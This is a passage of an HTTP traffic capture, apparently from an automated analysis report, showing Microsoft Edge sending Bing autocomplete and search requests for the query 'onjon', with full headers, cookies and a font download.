sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 434
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 67502a0834534816b511cea4fba371d1
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-VO8yq+46eF2KmNvrSR96JvvU5M6pBxyOiHeEtD8oei0='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Wed, 04 Dec 2024 10:08:08 GMT
set-cookie: MUID=3050E96B9E7E60123EA7FC209F036154; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:08 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=3050E96B9E7E60123EA7FC209F036154; expires=Mon, 29-Dec-2025 10:08:08 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=305A430F70E962E327EF5644719463C6; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:08 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:08 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:08 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=F5781A33482444B8BBC404388E14F1C6&dmnchg=1; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:08 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20241204; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:08 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:08 GMT; path=/; secure; SameSite=None
set-cookie: _SS=SID=305A430F70E962E327EF5644719463C6; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306888.7f0de68
GET

https://www.bing.com/qbox?query=onh&language=en-US&pt=EdgBox&cvid=0e0e04224c204a07ae85e85e161201dd&ig=6374bb6913c44f1987e70ed22a8e0b3a&oit=1&cp=3&pgcl=4

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /qbox?query=onh&language=en-US&pt=EdgBox&cvid=0e0e04224c204a07ae85e85e161201dd&ig=6374bb6913c44f1987e70ed22a8e0b3a&oit=1&cp=3&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 292
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 67502a0980854612a7b0b97765725247
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-eE5L+JlLM9iRczTlfL4yKwBFwVBB/+liADlGQ8Y8mDM='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Wed, 04 Dec 2024 10:08:09 GMT
set-cookie: MUID=10F0126A97846BC41E4B072196996ACA; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:09 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=10F0126A97846BC41E4B072196996ACA; expires=Mon, 29-Dec-2025 10:08:09 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=0C3962FC7B1861090BF177B77A0560E7; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:09 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:09 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:09 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=753CDBFA361A4B898176CA82884E82FD&dmnchg=1; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:09 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20241204; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:09 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:09 GMT; path=/; secure; SameSite=None
set-cookie: _SS=SID=0C3962FC7B1861090BF177B77A0560E7; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306889.7f0e334
GET

https://www.bing.com/qbox?query=on&language=en-US&pt=EdgBox&cvid=0e0e04224c204a07ae85e85e161201dd&ig=b5deb4cb600840459c8628729032f274&oit=1&cp=2&pgcl=4

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /qbox?query=on&language=en-US&pt=EdgBox&cvid=0e0e04224c204a07ae85e85e161201dd&ig=b5deb4cb600840459c8628729032f274&oit=1&cp=2&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 434
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 67502a0ac6ff463797e13da8bdf10a78
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-p3KYn314mCUnL6rWkuYwY/jZdD0gmg18NR+W+XRDbco='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Wed, 04 Dec 2024 10:08:10 GMT
set-cookie: MUID=15DCEAEF1E74630605E8FFA41FF962FE; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:10 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=15DCEAEF1E74630605E8FFA41FF962FE; expires=Mon, 29-Dec-2025 10:08:10 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=06E2B1D427806FA616C6A49F260D6EEA; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:10 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:10 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:10 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=28FA1975394642E58823C3987D5FD652&dmnchg=1; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:10 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20241204; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:10 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:10 GMT; path=/; secure; SameSite=None
set-cookie: _SS=SID=06E2B1D427806FA616C6A49F260D6EEA; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306890.7f0e769
GET

https://www.bing.com/qbox?query=onj&language=en-US&pt=EdgBox&cvid=0e0e04224c204a07ae85e85e161201dd&ig=4375ce3d9bf04af699c7cc83a749fa53&oit=1&cp=3&pgcl=4

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /qbox?query=onj&language=en-US&pt=EdgBox&cvid=0e0e04224c204a07ae85e85e161201dd&ig=4375ce3d9bf04af699c7cc83a749fa53&oit=1&cp=3&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 353
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 67502a0a50ee4e188667aef9b4c4008b
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-XIT0SejkHpmwbRHrweR95qW29L5kkimtbZUW2OYT/xY='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Wed, 04 Dec 2024 10:08:10 GMT
set-cookie: MUID=12F905D940CA62921D7E1092413D6344; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:10 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=12F905D940CA62921D7E1092413D6344; expires=Mon, 29-Dec-2025 10:08:10 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=3E2F36B9AD596C1C2DB423F2ACAE6DED; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:10 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:10 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:10 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=F0B5AE88BE9A4158937796D4D507FD7A&dmnchg=1; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:10 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20241204; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:10 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:10 GMT; path=/; secure; SameSite=None
set-cookie: _SS=SID=3E2F36B9AD596C1C2DB423F2ACAE6DED; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306890.7f0e82b
GET

https://www.bing.com/qbox?query=onjo&language=en-US&pt=EdgBox&cvid=0e0e04224c204a07ae85e85e161201dd&ig=7ca0e933740443c39aca440395ac5012&oit=1&cp=4&pgcl=4

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /qbox?query=onjo&language=en-US&pt=EdgBox&cvid=0e0e04224c204a07ae85e85e161201dd&ig=7ca0e933740443c39aca440395ac5012&oit=1&cp=4&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 242
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 67502a0ad8b84a1bb419b77c104d5645
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-zeYDpj+u2T2ZbUUjI4JFAnygmNByyYFRB2CAPdEU9x4='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Wed, 04 Dec 2024 10:08:10 GMT
set-cookie: MUID=313EF147DF3E61A43ADBE40CDE0B60F4; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:10 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=313EF147DF3E61A43ADBE40CDE0B60F4; expires=Mon, 29-Dec-2025 10:08:10 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=1793996C3A966AFC30808C273BA36B4A; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:10 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:10 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:10 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=278DAB36D2704BCBBD62E8BBD0ECFADC&dmnchg=1; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:10 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20241204; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:10 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:10 GMT; path=/; secure; SameSite=None
set-cookie: _SS=SID=1793996C3A966AFC30808C273BA36B4A; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306890.7f0ebe5
GET

https://www.bing.com/qbox?query=onjon&language=en-US&pt=EdgBox&cvid=0e0e04224c204a07ae85e85e161201dd&ig=ec57e656d6064151b3682ac9ac4f3296&oit=1&cp=5&pgcl=4

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /qbox?query=onjon&language=en-US&pt=EdgBox&cvid=0e0e04224c204a07ae85e85e161201dd&ig=ec57e656d6064151b3682ac9ac4f3296&oit=1&cp=5&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 263
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 67502a0bb9bc4ba9a4dcfadd4cbef707
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-5TiNAHi8xzJ02D3a+YOW2EjMjbDT5Qj0uk9e51tmC98='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Wed, 04 Dec 2024 10:08:11 GMT
set-cookie: MUID=356F0441A3536D3D31CB110AA24B6C96; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:11 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=356F0441A3536D3D31CB110AA24B6C96; expires=Mon, 29-Dec-2025 10:08:11 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=24CE4CD472B96F830CD1599F73A16E73; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:11 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:11 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:11 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=5E2A6A3B49E543B0A9B3AD389D0C074A&dmnchg=1; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:11 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20241204; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:11 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:11 GMT; path=/; secure; SameSite=None
set-cookie: _SS=SID=24CE4CD472B96F830CD1599F73A16E73; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306891.7f0eee5
GET

https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
sec-ch-ua-mobile: ?0
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-type: text/html; charset=utf-8
cache-control: private, max-age=0
content-encoding: br
expires: Wed, 04 Dec 2024 10:07:13 GMT
vary: Accept-Encoding
x-eventid: 67502a0dbd8a4adf97b2602b33527ef5
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
strict-transport-security: max-age=31536000; includeSubDomains; preload
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-y9eBivBRBXo9AYB69/y5p+QkfiTpkZiS5/H3exo9qLE='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingserp&ndcParam=QWthbWFp"}]}
report-to: {"group":"crossorigin-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingserp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0,"include_subdomains":true}
cross-origin-embedder-policy-report-only: 'require-corp; report-to=\"crossorigin-errors\"'
cross-origin-opener-policy-report-only: 'same-origin; report-to=\"crossorigin-errors\"'
date: Wed, 04 Dec 2024 10:08:13 GMT
set-cookie: MUID=288EEA9122C96A183944FFDA23616B9B; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:13 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B; expires=Mon, 29-Dec-2025 10:08:13 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:13 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:13 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43; domain=.bing.com; path=/; secure; SameSite=None
set-cookie: SRCHS=PC=U531; domain=.bing.com; path=/; secure; SameSite=None
set-cookie: SRCHD=AF=ANAB01; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:13 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:13 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20241204; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:13 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:13 GMT; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306893.7f0fb1a
set-cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR; Domain=.bing.com; Path=/; Expires=Wed, 04 Dec 2024 12:08:13 GMT; Max-Age=7200
GET

https://www.bing.com/sa/simg/Roboto_Regular.woff2

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /sa/simg/Roboto_Regular.woff2 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
dnt: 1
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: font
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: SRCHHPGUSR=SRCHLANG=en
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR

Response

HTTP/2.0 200

content-length: 15344
content-type: font/woff2
cache-control: public, max-age=15552000
last-modified: Mon, 01 Jan 1601 00:00:00 GMT
